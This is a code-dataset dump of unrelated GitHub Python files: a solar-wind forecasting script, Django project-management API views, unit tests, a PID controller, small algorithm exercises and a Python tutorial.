sw_recurrence = sw_recurrence.interp_to_time(sw_validation['time'])\n\n pltvars = ['bz', 'btot', 'speed', 'density', 'dst']\n ylabels = {'bz': '$B_z$ [nT]', 'btot': '$B_{tot}$ [nT]', 'speed': 'Solar wind speed\\n[km/s]',\n 'density': 'Density [ccm-3]', 'dst': '$Dst$ [nT]'}\n l5_true = sw_validation['ae'] != 1.\n l5_inds = np.where(l5_true)\n fig, axes = plt.subplots(len(pltvars)+1, sharex=True, figsize=pltcfg.figsize)\n\n for i_var, pltvar in enumerate(pltvars):\n if pltvar != 'dst':\n axes[i_var].plot_date(sw_recurrence['time'], sw_recurrence[pltvar], \n 'k-', lw=lw, alpha=0.2, label=\"27-day rec (not used)\")\n elif pltvar == 'dst':\n axes[i_var].plot_date(kyoto_dst['time'], kyoto_dst['dst'], '--', c='green', lw=lw, label=\"Kyoto Dst\")\n sta_only = np.full((len(sw_validation)), np.nan)\n sta_only[l5_true] = sw_validation[pltvar][l5_true]\n rec_only = np.full((len(sw_validation)), np.nan)\n rec_only[~l5_true] = sw_validation[pltvar][~l5_true]\n axes[i_var].plot_date(sw_validation['time'], rec_only, 'k-', lw=lw, label=\"27-day rec ({:.0f}%)\".format(100.*(len(sw_validation)-len(l5_inds[0]))/len(sw_validation)))\n axes[i_var].plot_date(sw_validation['time'], sta_only, 'r-', lw=lw, label=\"STEREO-A ({:.0f}%)\".format(100.*len(l5_inds[0])/len(sw_validation)))\n axes[i_var].set_ylabel(ylabels[pltvar])\n axes[-1].plot_date(sw_validation['time'], sw_validation['dst']-kyoto_dst['dst'], 'k-', lw=lw)\n axes[-1].set_ylabel(\"$\\Delta Dst$ [nT]\")\n\n # Formatting:\n axes[0].set_title(\"Validation plot for solar wind forecasting between {} and {}\".format((now - timedelta(days=look_back)).strftime('%Y-%m-%d'), now.strftime('%Y-%m-%d')))\n axes[-1].set_xlim([now - timedelta(days=look_back), now])\n axes[0].legend(loc='upper left', ncol=3)\n axes[-2].legend(loc='upper left', ncol=3)\n\n plt.subplots_adjust(hspace=0.1)\n plt.savefig('predstorm_validation.png')\n\n\n#========================================================================================\n#--------------------------------- RUN SCRIPT -------------------------------------------\n#========================================================================================\n\nif __name__ == '__main__':\n\n run_mode = 'normal'\n verbose, use3DCORE, force_stereoa = True, False, False\n run_validation = False\n for opt, arg in myopts:\n if opt == \"--server\":\n server = True\n if opt == '-v' or opt == \"--verbose\":\n if arg == 'False':\n verbose = False\n elif opt == '--historic':\n run_mode = 'historic'\n timestamp = datetime.strptime(arg, \"%Y-%m-%dT%H:%M\")\n timestamp = timestamp.replace(tzinfo=None)\n elif opt == '--use3DCORE':\n use3DCORE = True\n path_3DCORE = arg\n elif opt == '--force-stereoa':\n force_stereoa = True\n elif opt == '--validation':\n run_validation = True\n elif opt == '-h' or opt == '--help':\n print(\"\")\n print(\"-----------------------------------------------------------------\")\n print(\"DESCRIPTION:\")\n print(\"This PREDSTORM L5 script uses time-shifted data from a spacecraft\")\n print(\"east of the Sun-Earth line, currently STEREO-A, to provide real-\")\n print(\"time solar wind and magnetic storm forecasting.\")\n print(\"-------------------------------------\")\n print(\"RUN OPTIONS:\")\n print(\"--server : Run script in server mode.\")\n print(\" python predstorm_l5.py --server\")\n print(\"--historic : Run script with a historic data set.\")\n print(\" python predstorm_l5.py --historic='2017-09-07T23:00'\")\n print(\"--use3DCORE : Run script with 3DCORE flux rope input.\")\n print(\" python predstorm_l5.py --historic='2017-09-07T23:00' --use3DCORE='dst.pickle'\")\n print(\"--validation : Run script in validation mode.\")\n print(\" python predstorm_l5.py --validation\")\n print(\"--force-stereoa : Force STEREO-A usage (if the data exists), even if the data is bad.\")\n print(\" python predstorm_l5.py --force-stereoa\")\n print(\"GENERAL OPTIONS:\")\n print(\"-h/--help : print this help data\")\n print(\"-v/--verbose : print logging output to shell for debugging\")\n print(\"-------------------------------------\")\n print(\"EXAMPLE USAGE:\")\n print(\" Most basic:\")\n print(\" python predstorm_l5.py\")\n print(\" --> See results/ folder for output.\")\n print(\"-----------------------------------------------------------------\")\n print(\"\")\n sys.exit()\n\n # INITIATE LOGGING:\n logger = ps.init_logging(verbose=verbose)\n\n # Make sure all paths are available:\n # ----------------------------------\n inputpath = config['RealTimePred']['InputDataPath']\n if not os.path.exists(inputpath):\n os.mkdir(inputpath)\n\n savepath_rt = config['RealTimePred']['RealtimePath']\n if not os.path.exists(savepath_rt):\n os.mkdir(savepath_rt)\n\n savepath_archive = config['RealTimePred']['ArchivePath']\n if not os.path.exists(os.path.join(savepath_archive, 'plots')):\n os.mkdir(os.path.join(savepath_archive, 'plots'))\n if not os.path.exists(os.path.join(savepath_archive, 'text')):\n os.mkdir(os.path.join(savepath_archive, 'text'))\n\n\n # Closes all plots\n plt.close('all')\n\n # Run validation:\n if run_validation:\n validation()\n sys.exit()\n\n main()\n\n print(\"------ This run completed at {}! ------\\n\".format(datetime.utcnow()))\n\n","repo_name":"helioforecast/Predstorm","sub_path":"run_predstorm_l5.py","file_name":"run_predstorm_l5.py","file_ext":"py","file_size_in_byte":34296,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"3"} +{"seq_id":"33045590780","text":"from ..models import Model, Alien\nfrom ..fields import Field\nimport pytest\n\ndef test_Model():\n with pytest.raises(NotImplementedError):\n tmp=Model()\n\ndef test_Alien():\n tmp=Alien()\n assert isinstance(tmp, Alien)==True\n assert type(tmp.get_list_fields())==list\n for field in tmp.fields:\n assert isinstance(field, Field)\n for field in tmp.fields:\n tmp.set(field.field_id, \"test value\")\n assert tmp.get(field.field_id)==\"test value\"\n","repo_name":"gorbinphilip/PyRegistrar","sub_path":"pyregistrar/test/test_models.py","file_name":"test_models.py","file_ext":"py","file_size_in_byte":476,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"39855597560","text":"from django.utils import timezone\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\nfrom fyp_management.permission import IsFYPPanel, IsStudent, IsSupervisor\nfrom core.models import User, fyppanel, project, supervisor, teamMember, milestone\nfrom project.serializers import projectlistSerializer, projectSerializer\nfrom teamMember.serializers import teamMemberSerializer\nfrom milestone.models import Milestonemarks\nfrom django.core.mail import send_mail\nfrom django.conf import settings\nfrom google.auth import exceptions\n\n# # Create your views here.\nclass projectAPIView(APIView):\n permission_classes = [IsAuthenticated & IsFYPPanel]\n def post(self, request):\n department = request.user.department\n dep_id = department.id\n try:\n \n json_title = request.data.get(\"title\")\n json_year = request.data.get(\"year\")\n json_batch = request.data.get(\"batch\")\n json_description = request.data.get(\"description\")\n json_domain = request.data.get(\"domain\")\n json_no_of_group_members = int(request.data.get(\"no_of_group_members\"))\n json_supervisor = int(request.data.get(\"supervisor\"))\n\n # Creating the dictionary\n data = {\n 'title': json_title,\n 'year': json_year,\n 'batch': json_batch,\n 'description': json_description,\n 'domain': json_domain,\n 'no_of_group_members': json_no_of_group_members,\n 'supervisor': json_supervisor,\n 'department': dep_id\n }\n serialize = projectSerializer(data=data)\n if serialize.is_valid():\n serialize.save()\n sup = supervisor.objects.get(id=json_supervisor, deleted_at=None)\n email_to = sup.user.email\n subject = f'WELCOME IN {json_title} PROJECT'\n email_from = request.user\n message = f\"You are added in {json_title} PROJECT By FYP Co-ordinator of {request.user.department} department of {request.user.uni}\\nYou are required to start the project by adding {json_no_of_group_members} Students (team Members) init.\\nPlease find below mentioned link to access the system.\\n{'https://pmbotics.netlify.app/'}\\nUse your login credentials which is given to you by registration email.\\nBest Regards\\nFYP Co-ordinator Name: {request.user.name}\\nEmail Id: {email_from}\\nThankyou\"\n recipient_list = [email_to, email_from]\n try:\n send_mail(subject, message, email_from, recipient_list)\n except exceptions.GoogleAuthError:\n return Response({'error': 'Failed to send email.'}, status=500)\n\n return Response(\n {\n \"status\": 200,\n \"message\": \"Success\",\n \"body\": {},\n \"exception\": None \n }\n ) \n else:\n return Response(\n {\n \"status\": 422,\n \"message\": serialize.errors,\n \"body\":{},\n \"exception\": \"Validation Error\",\n }\n )\n except Exception as e:\n return Response(\n {\n \"status\": 400,\n \"message\": \"Bad Request\",\n \"body\": {},\n \"exception\": str(e)\n }\n )\n\n\nclass projectlistAPI(APIView):\n permission_classes = [IsAuthenticated & (IsSupervisor | IsStudent)]\n def get(self, request):\n try:\n if request.user.role == User.SUPERVISOR:\n sup = supervisor.objects.get(user=request.user, deleted_at=None)\n pro_queryset = project.objects.filter(supervisor=sup, deleted_at=None)\n data = []\n for pro in pro_queryset:\n team_member = teamMember.objects.filter(project_id=pro.id, deleted_at=None)\n current_no_of_group_members = len(team_member)\n serialize = projectlistSerializer(pro)\n project_data = serialize.data \n data_dict = {\n 'current_no_of_group_members': current_no_of_group_members,\n **project_data\n }\n data.append(data_dict)\n return Response( \n {\n \"data\": data,\n \"status\": 200,\n \"message\": \"Success\",\n \"body\": {},\n \"exception\": None \n }\n )\n elif request.user.role == User.STUDENT:\n tm = teamMember.objects.get(user=request.user, deleted_at=None)\n pro = tm.project\n serialize = projectlistSerializer(pro) \n return Response( \n {\n \"data\": serialize.data,\n \"status\": 200,\n \"message\": \"Success\",\n \"body\": {},\n \"exception\": None \n }\n )\n except Exception as e:\n return Response( \n {\n \"status\": 404,\n \"message\": \"some exception\",\n \"body\": {},\n \"exception\": str(e) \n }\n )\n \n\nclass updateprojectAPI(APIView):\n permission_classes = [IsAuthenticated & IsFYPPanel]\n def patch(self, request):\n try:\n try:\n sup = project.objects.get(id=request.data.get(\"id\"), deleted_at=None)\n team_member = teamMember.objects.filter(project__id=request.data.get(\"id\"), deleted_at=None)\n if len(team_member) > request.data.get(\"no_of_group_members\"):\n return Response( \n {\n \"data\": [],\n \"status\": 200,\n \"message\": \"You are not allowed to decrease number of group members becuase there are already more group members than your specified limit, In order to decrease group members. ask supervisor to remove some members from project\",\n \"body\": {},\n \"exception\": None \n }\n )\n else:\n serialize = projectSerializer(sup,data=request.data)\n if serialize.is_valid():\n serialize.save()\n return Response( \n {\n \"data\": serialize.data,\n \"status\": 200,\n \"message\": \"Success\",\n \"body\": {},\n \"exception\": None \n }\n )\n else:\n return Response(\n {\n \"status\": 422,\n \"message\": serialize.errors,\n \"body\": {},\n \"exception\": \"some exception\" \n }\n )\n except:\n sup = project.objects.get(id=request.data.get(\"id\"), deleted_at=None)\n serialize = projectSerializer(sup,data=request.data)\n if serialize.is_valid():\n serialize.save()\n return Response( \n {\n \"data\": serialize.data,\n \"status\": 200,\n \"message\": \"Success\",\n \"body\": {},\n \"exception\": None \n }\n )\n else:\n return Response(\n {\n \"status\": 422,\n \"message\": serialize.errors,\n \"body\": {},\n \"exception\": \"some exception\" \n }\n ) \n except Exception as e:\n return Response( \n {\n \"status\": 404,\n \"message\": \"some exception\",\n \"body\": {},\n \"exception\": str(e) \n }\n )\n\nclass deleteprojectAPI(APIView):\n permission_classes = [IsAuthenticated & IsFYPPanel]\n def delete(self, request, pk):\n try:\n my_object = project.objects.get(pk=pk, deleted_at=None)\n my_object.deleted_at = timezone.now()\n my_object.save()\n except project.DoesNotExist:\n return Response(\n {\n \"status\": 404,\n \"message\": \"Not Found\",\n \"body\": {},\n \"exception\": None \n }\n )\n return Response(\n {\n \"status\": 200,\n \"message\": \"Successfuly deleted\",\n \"body\": {},\n \"exception\": None \n }\n )\n\nclass addteammemberAPI(APIView):\n permission_classes = [IsAuthenticated & IsSupervisor]\n def post(self, request):\n try:\n pro = project.objects.get(id=request.data.get(\"project_id\"), deleted_at=None)\n tm = teamMember.objects.get(id=request.data.get(\"teammember_id\"), deleted_at=None)\n tm.project = pro\n tm.save()\n email_to = tm.user.email\n subject = f'WELCOME IN {pro.title} PROJECT'\n email_from = request.user\n message = f\"You are added in {pro.title} PROJECT By FYP Supervisor of {request.user.department} department of {request.user.uni}\\nPlease find below mentioned link to access the system.\\n{'https://pmbotics.netlify.app/'}\\nUse your login credentials which is given to you by registration email.\\nBest Regards\\nFYP Supervisor Name: {request.user.name}\\nEmail Id: {email_from}\\nThankyou\"\n recipient_list = [email_to, email_from]\n try:\n send_mail(subject, message, email_from, recipient_list)\n except exceptions.GoogleAuthError:\n return Response({'error': 'Failed to send email.'}, status=500)\n\n return Response(\n {\n \"status\": 200,\n \"message\": \"Success\",\n \"body\": {},\n \"exception\": None \n }\n )\n except Exception as e:\n return Response( \n {\n \"status\": 404,\n \"message\": \"some exception\",\n \"body\": {},\n \"exception\": str(e) \n }\n )\n \n\n def patch(self, request):\n try:\n pro = project.objects.get(id=request.data.get(\"project_id\"), deleted_at=None)\n tm = teamMember.objects.get(id=request.data.get(\"teammember_id\"), deleted_at=None)\n if tm.project == None:\n return Response(\n {\n \"status\": 404,\n \"message\": \"Not Found\",\n \"body\": {},\n \"exception\": None \n }\n )\n else: \n tm.project = None\n tm.save()\n email_to = tm.user.email\n subject = f'REMOVE FROM {pro.title} PROJECT'\n email_from = request.user\n message = f\"You are removed from {pro.title} PROJECT By FYP Supervisor of {request.user.department} department of {request.user.uni}.\\nPlease contact FYP Co-ordinator or wait for new project onboarding\\nBest Regards\\nFYP Supervisor Name: {request.user.name}\\nEmail Id: {email_from}\\nThankyou\"\n recipient_list = [email_to, email_from]\n try:\n send_mail(subject, message, email_from, recipient_list)\n except exceptions.GoogleAuthError:\n return Response({'error': 'Failed to send email.'}, status=500)\n return Response(\n {\n \"status\": 200,\n \"message\": \"Successfuly deleted\",\n \"body\": {},\n \"exception\": None \n }\n )\n except Exception as e:\n return Response( \n {\n \"status\": 404,\n \"message\": \"some exception\",\n \"body\": {},\n \"exception\": str(e) \n }\n )\n \n \nclass allprojectAPI(APIView):\n permission_classes = [IsAuthenticated & IsFYPPanel]\n def get(self, request):\n try:\n dep_id = request.user.department\n my_objects = project.objects.filter(department=dep_id, deleted_at=None)\n serializer = projectlistSerializer(my_objects, many=True)\n return Response({\n \"status\": 200,\n \"message\": \"Success\",\n \"body\": serializer.data,\n \"exception\": None\n })\n except Exception as e:\n return Response({\n \"status\": 404,\n \"message\": \"some exception\",\n \"body\": {},\n \"exception\": str(e)\n })\n\nclass changesupervisorAPI(APIView):\n permission_classes = [IsAuthenticated & IsFYPPanel]\n def patch(self, request):\n try:\n pro = project.objects.get(id=request.data.get(\"pro_id\"), deleted_at=None)\n sup = supervisor.objects.get(id=request.data.get(\"sup_id\"), deleted_at=None)\n pro.supervisor = sup\n pro.save()\n return Response( \n {\n \"status\": 200,\n \"message\": \"Success\",\n \"body\": {},\n \"exception\": None \n }\n )\n \n except Exception as e:\n return Response( \n {\n \"status\": 404,\n \"body\": {},\n \"exception\": str(e) \n }\n )\n\nclass studentprojectwiseAPI(APIView):\n permission_classes = [IsAuthenticated & (IsSupervisor | IsStudent | IsFYPPanel)]\n def get(self, request):\n try:\n tm = teamMember.objects.filter(project=project.objects.get(id=request.GET.get(\"pro_id\")), deleted_at=None)\n serialize = teamMemberSerializer(tm, many=True)\n return Response({\n \"status\": 200,\n \"message\": \"Success\",\n \"body\": serialize.data,\n \"exception\": None\n })\n except Exception as e:\n return Response({\n \"status\": 404,\n \"message\": \"some exception\",\n \"body\": {},\n \"exception\": str(e)\n })\n\nclass markasCompletedApi(APIView):\n permission_classes = [IsAuthenticated & IsFYPPanel]\n\n def patch(self, request):\n try:\n pro=project.objects.get(id=request.data.get(\"pro_id\"), deleted_at=None) \n if request.data.get(\"status\") == \"completed\":\n milestone_marks = Milestonemarks.objects.filter(project=pro, deleted_at=None)\n milestone_marks_dict = {}\n for milestone_mark in milestone_marks:\n if milestone_mark.milestone_id not in milestone_marks_dict:\n milestone_marks_dict[milestone_mark.milestone_id] = []\n milestone_marks_dict[milestone_mark.milestone_id].append(milestone_mark.marks)\n averages = {key: sum(values) / len(values) for key, values in milestone_marks_dict.items()}\n grad = 0\n for i in averages:\n grad += averages[i]\n pro.status = request.data.get(\"status\")\n pro.grade = grad\n pro.save()\n return Response({\n \"status\": 200,\n \"message\": \"Success\",\n \"body\": {},\n \"exception\": None\n })\n else:\n pro.status = request.data.get(\"status\")\n pro.grade = 0\n pro.save()\n return Response({\n \"status\": 200,\n \"message\": \"Success\",\n \"body\": {},\n \"exception\": None\n })\n except Exception as e:\n return Response({\n \"status\": 404,\n \"message\": \"some exception\",\n \"body\": {},\n \"exception\": str(e)\n })\n","repo_name":"usama-ali74/pmboticsbackend","sub_path":"project/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":17598,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"18336364209","text":"import unittest\nfrom matplotlib.figure import Figure\nfrom chart.treemap import Treemap\n\nclass TestTreemap(unittest.TestCase):\n def setUp(self):\n data = {\n \"Documents\": (None, None),\n \"School\": (None, \"Documents\"),\n \"Assignment\": (100, \"School\"),\n \"Personal\": (None, \"Documents\"),\n \"CV\": (200, \"Personal\")\n }\n self.treemap = Treemap(data)\n\n def test_get_node_value(self):\n self.assertEqual(self.treemap._Treemap__get_node_value((\"node1\", 23)), 23, \"Should equal 23\")\n\n def test_get_figure(self):\n self.assertTrue(isinstance(self.treemap.get_figure(), Figure))\n\n def test_convert_data(self):\n expected_data = (\n \"Documents\", \n (\n (\n \"School\",\n (\n (\"Assignment\",\n 100\n ),\n )\n ),\n (\n \"Personal\",\n (\n (\n \"CV\",\n 200\n ),\n )\n )\n )\n )\n converted_data = self.treemap._Treemap__convert_data()\n self.assertEqual(converted_data, expected_data)\n\n def test_calculate_node_value_1(self):\n key_list = [\"Documents\", \"School\", \"Assignment\", \"Personal\", \"CV\"]\n return_value = self.treemap._Treemap__calculate_node_value(\"CV\", key_list)\n self.assertEqual(return_value, 200)\n \n def test_calculate_node_value_2(self):\n key_list = [\"Documents\", \"School\", \"Assignment\", \"Personal\", \"CV\"]\n return_value = self.treemap._Treemap__calculate_node_value(\"School\", key_list)\n self.assertEqual(return_value, ((\"Assignment\", 100),))\n\n def test_get_node_name(self):\n self.assertEqual(self.treemap._Treemap__get_node_name((\"Cecil\", 20)), \"Cecil\")\n\n def test_get_node_value_1(self):\n self.assertEqual(self.treemap._Treemap__get_node_value((\"Cecil\", 20, None)), 20)\n\n def test_get_node_value_2(self):\n self.assertEqual(self.treemap._Treemap__get_node_value((\"Cecil\", ((\"A\", 3), (\"B\", 5)), 8)), 8)\nif __name__ == \"__main__\":\n unittest.main()\n\n","repo_name":"pycharts/pycharts","sub_path":"tests/test_treemap.py","file_name":"test_treemap.py","file_ext":"py","file_size_in_byte":2618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"32513406565","text":"#! python 3\n\n\n\"\"\"pid_controller.py\n \n Requires:\n kp - proportional gain (default is None)\n -> If given, the proportional controller is used.\n ki - integral gain (default is None)\n -> If given, the integral controller is used.\n kd - derivative gain (default is None)\n -> If given, the derivative controller is used.\n max_input - maximum desired input if any (default is None)\n min_input - minimum desired input if any (default is None)\n sse_ratio - steady-state error ratio (default is None)\n -> Set this if you want to use the integral controller only for\n eliminating steady-state error (0.1 < sse_dtctr < 0.3 recommended).\n threshold_i_ctrlr - threshold intergral controller (default is None)\n -> Each time it is detected that it is in the range of steady-state error,\n self._i_counter is incresed by 1, and when it exceeds threshold_i_cntrlr,\n steady-state error is detected, and the integral controller is activated.\n\n Returns:\n input: float\n \n Notes:\n If you put a limitation on the integral controller, you MUST give BOTH sse_ratio AND threshold_i_ctrlr.\n\"\"\"\n\n\nfrom time import time\nfrom typing import Optional\n\nclass PIDController:\n\n def __init__(self,\n kp: Optional[float] = None,\n ki: Optional[float] = None,\n kd: Optional[float] = None,\n max_input: Optional[float] = None,\n min_input: Optional[float] = None,\n sse_ratio: Optional[float] = None,\n threshold_i_ctrlr: Optional[int] = None) -> None:\n \n \"\"\"Initializes the instance variables\"\"\"\n # Setting constants\n self._kp: Optional[float] = kp\n self._ki: Optional[float] = ki\n self._kd: Optional[float] = kd\n self._max_input: Optional[float] = max_input\n self._min_input: Optional[float] = min_input\n self._sse_ratio: Optional[float] = sse_ratio\n self._threshold_i_ctrlr: Optional[int] = threshold_i_ctrlr\n\n # Initializing variables\n self._last_time: float = time()\n self._last_i_term: float = 0.\n self._last_error: float = 0.\n self._sse_range: float = 0.\n self._counter: int = 0\n self._i_counter: int = 0\n\n def calc_input(self, error: float) -> float:\n \"\"\"Calculates an input using PID controller\"\"\"\n # Activating this if-statement only once\n if self._counter == 0:\n # Done in order to make the first dalta_error 0\n self._last_error = error\n \n # Calculating the steady-state error range, used in the integral controller\n if self._sse_ratio is not None:\n self._sse_range = error * self._sse_ratio\n \n # Making the counter non 0 so that it will not be activated from the next time\n self._counter += 1\n \n # Preparating parameters\n delta_error = error - self._last_error\n current_time = time()\n delta_time = current_time - self._last_time\n\n # Calculating each term\n if self._kp is not None:\n p_term = self._calc_p_term(error)\n else:\n p_term = 0.\n \n if self._ki is not None:\n if self._sse_ratio is not None & self._threshold_i_ctrlr is not None:\n i_term = self._calc_i_term_sse(error, delta_time)\n else:\n i_term = self._calc_i_term\n else:\n i_term = 0.\n \n if self._kd is not None:\n d_term = self._calc_d_term(delta_error, delta_time)\n else:\n d_term = 0.\n\n # Calculating an input\n input = p_term + i_term + d_term\n if self._min_input is not None:\n if input < self._min_input:\n input = self._min_input\n if self._max_input is not None:\n if input > self._max_input:\n input = self._max_input\n\n # Saving parameters\n self._last_error = error\n self._last_time = current_time\n self._last_i_term = i_term\n\n return input\n \n def _calc_p_term(self, error: float) -> float:\n \"\"\"Calculates a p_term\"\"\"\n return self._kp * error\n \n def _calc_i_term(self, error: float, delta_time: float) -> float:\n \"\"\"Calculates an i_term using trapezoidal rule\"\"\"\n delta_i_term = ((self._last_error + error) / 2) * delta_time \n return self._ki * (self._last_i_term + delta_i_term)\n\n def _calc_i_term_sse(self, error: float, delta_time: float) -> float:\n \"\"\"Calculates an i_term using trapezoidal rule or returns 0\n \n Note:\n -----\n This integral controller is activated only for eliminating steady-state error.\n \"\"\"\n \n # Increasing self._i_counter by 1 when the error is within the margin of error (moe)\n if -self._sse_range < error < self._sse_range:\n self._i_counter += 1\n else:\n self._last_i_term = 0\n self._i_counter = 0\n \n # Activating the integral controller when the steady-state error is detected\n if self._i_counter > self._threshold_i_ctrlr:\n delta_i_term = ((self._last_error + error) / 2) * delta_time \n return self._ki * (self._last_i_term + delta_i_term)\n else:\n return 0\n\n def _calc_d_term(self, delta_error: float, delta_time: float) -> float:\n \"\"\"Calculates a d_term using approximation\"\"\"\n return self._kd * (delta_error / delta_time)","repo_name":"FROM-THE-EARTH/canbeta","sub_path":"canbeta/parent/util/pid_controller.py","file_name":"pid_controller.py","file_ext":"py","file_size_in_byte":5922,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"29124122325","text":"\ndef is_unique(string):\n\ti = 0\n\twhile i < len(string):\n\t\tj = i + 1\n\t\twhile j < len(string):\n\t\t\tif string[i] == string[j]:\n\t\t\t\treturn False\n\t\t\tj = j + 1\n\t\ti = i + 1\n\treturn True\n\ndef is_unique_sorted(string):\n\tstring = sorted(string)\n\ti = 0\n\twhile i < len(string):\n\t\tj = i + 1\n\t\twhile j < len(string):\n\t\t\tif string[i] == string[j]:\n\t\t\t\treturn False\n\t\t\tj = j + 1\n\t\ti = i + 1\n\treturn True\n\ndef is_unique_ht(string):\n\tht = dict()\n\tfor char in string:\n\t\tif char in ht:\n\t\t\treturn False\n\t\telse:\n\t\t\tht[char] = True\n\treturn True \n\ndef main():\n\tstring = \"Omer\"\n\tiu = is_unique_ht(string.lower())\n\tprint(iu)\n\nif __name__ == \"__main__\":\n\tmain()\n","repo_name":"sumeyyadede/algorithm-problems","sub_path":"is_unique.py","file_name":"is_unique.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"10399462725","text":"# problem12.py\n\nimport math\n\nx = 0\nz = 0\nn = 1\n\ni = True\nwhile i != False:\n z = n * (n + 1) / 2\n x = 2\n \n y = int(math.sqrt(z))\n for k in range(2, y):\n if z % k == 0:\n x += 2\n if x == 500:\n i = False\n\n n += 1\n\nprint(z)\n","repo_name":"anpe9592/projectEuler","sub_path":"11-20/problem12.py","file_name":"problem12.py","file_ext":"py","file_size_in_byte":273,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"11301745125","text":"#name=input(\"please enter a name\\n\")\n\n#print('hello', name)\n\nr'''1\na = -100 ;b=200;c=0\n\nif(a>0):\n print(a)\n print(b)\n print('中文A')\nelif c ==0 :\n print('a!=0')\nelse:\n print(-a)\n print(-b)\n print('中文B')\n '''\n\nr'''2\nsum = 0\nfor i in range(1,100):\n sum += i\n \nprint(sum)\n\nsum=0 ;n=99\nwhile n>0:\n sum+=n\n n-=2\nprint(sum)\n\n#web 函数\n'''\n\ndef func1(param1, param2 = 5):\n if not isinstance(param1, (int, float)):\n raise TypeError('param1类型错误')\n elif not isinstance(param2, (int)):\n raise TypeError('param2类型错误')\n m = 10;\n if param1 >= 10:\n m = param1;\n elif param2 >= 10:\n m=param2\n else:\n m=-1\n\n return(m)\n\ndef nop():\n pass\n\n#range([start,]end[,step]) 从start开始,到stop结束(不包括stop),步长为step\nfor i in range(9,-1,-1):\n print (i)\n\nfor i in range(9,0,-1):\n print (i)\n\nimport math\ndef quadratic(a,b,c):\n \n if not isinstance(a,(int,float)):\n raise TypeError('a type error')\n elif not isinstance(b,(int,float)):\n raise TypeError('b type error')\n elif not isinstance(c,(int,float)):\n raise TypeError('c type error')\n\n if(b*b-4*a*c < 0):\n raise ValueError(b*b-4*a*c)\n\n return (-b+math.sqrt(b*b-4*a*c))/2/a, (-b-math.sqrt(b*b-4*a*c))/2/a\n\nL=[1,2,3]\ndef calc(n):\n sum=0\n for i in n:\n sum += i**2\n return sum\n\ndef calc2(*n):\n sum=0\n for i in n:\n sum += i**2\n return sum\n\ncalc(L)\ncalc2(*L)\ndict1 = {'mike':14, 'bob':56, 'lily':17, '13':13}\n\nfor k in dict1:\n print(k)\n\nfor v in dict1.values():\n print(v)\n\nfor k,v in dict1.items():\n print(k,v)\n \n\ndef person(name, age, **kws):\n print('name:',name,'age:',age,'others:',kws)\n if 'lily' in kws:\n print('lily is here')\n\nperson('lily', 16, city='newyork')\nperson('lucy', 17, **dict1)\n\ndef person2(name, age, *, city, job):\n print('name:',name,'age:',age,'city:',city,'job:',job)\n\nperson2('lily', 16, city='newyork', job='stu')\n\ndef person3(name, age, *others, city='harbin', job):\n print('name:',name,'age:',age,'others:',others,'city:',city,'job:',job)\n\nperson3('lily', 16, [1,2],city='newyork', job='stu')\n\nperson3('lily',16,{'grade':3},job='stu')\n\n\ndef product(*L):\n if len(L) == 0:\n raise TypeError('L is empty')\n else:\n multi = 1\n \n for i in L:\n multi *= i\n \n return multi\n\ntry:\n product()\n print('failed')\nexcept TypeError:\n print('succ')\n\ndef temp(a,b,c):\n print(a+b+c)\n\ndef fact(n):\n if n == 1:\n return 1;\n\n return n*fact(n-1)\n\n#递归\ndef hanoi(n,a,b,c):\n if 1 == n:\n print('move', a, '-->', c)\n else:\n hanoi(n-1, a, c, b)\n hanoi(1, a, b, c)\n hanoi(n-1, b, a, c)\n \ndef myprint():\n temp(1,2,3)\n temp(*(1,2,3))\n temp(**{'a':1,'b':2,'c':3})\n print(fact(100))\n hanoi(4,'a','b','c')\n\nmyprint()\n\n#切片\nL1=['mike','lily','david','john','tim','sarah','jack','89',13]\n\nL1[:4]\nL1[0:4]\nL1[4:6]\nL1[-3:]\nL1[-4:-1]\nL1[:5:2]\nL1[::3]\n'ABCDEFGHIJK'[:3]\n'ABCDEFGHIJK'[::3]\n(0, 1, 2, 3, 4, 5)[:3]\n\nstr = ' hello world '\n\ndef trimC(s):\n if 0 == len(s):\n return s\n \n f=True\n for t in s:\n if t != ' ':\n f=False\n\n if f:\n return ''\n\n for i in range(0,len(s)):\n if s[i] != ' ':\n s = s[i:]\n break\n \n for i in range(len(s)-1,-1,-1):\n if s[i] != ' ':\n s = s[:i+1]\n break\n \n return s\n\ndef trimP(s):\n while s[:1] == ' ':\n s = s[1:]\n \n while s[-1:] == ' ':\n s = s[:-1]\n \n return s\n \n \nprint('trimC:', trimC(str))\nprint('trimP:', trimP(str))\n\n\nfrom collections import Iterable\n\nprint(isinstance('abc', Iterable))\n\nfor i,v in enumerate(['a', 'b', 'c']):\n print(i,v)\n\nfor i,v in [(1,2), (2,4), (3,9), (9,'a')]:\n print(i,v)\n\nfor i,v in enumerate([(1,2), (2,4), (3,9)]):\n print(i,v)\n\ndef findMinAndMax(L):\n a,b = None,None\n \n if [] == L:\n return (a,b)\n\n a=L[0];b=L[0]\n for i in L:\n if i b:\n b=j\n\n return (a,b)\n\n","repo_name":"bingshuizhilian/Python","sub_path":"course/1-基础.py","file_name":"1-基础.py","file_ext":"py","file_size_in_byte":4160,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"43079583997","text":"### More detailed examples are available in\n### when installing the pymcmc package\n### see the directory $PREFIX/pymcmc/examples/\n### where PREFIX is where the package was\n### installed (eg /usr/local/lib/python2.6/dist-packages/)\n\n### Empirical illustrations ###\n### Example 1: Linear regression model:\n### Variable selection and estimation\nimport os\nfrom numpy import loadtxt, hstack, ones, random, zeros, asfortranarray, log\nfrom pymcmc.mcmc import MCMC, CFsampler\nfrom pymcmc.regtools import StochasticSearch, BayesRegression\nimport pymcmc\n\n\"\"\" get the path for the data. If this was installed using setup.py\nit will be in the data directory of the module\"\"\"\ndatadir = 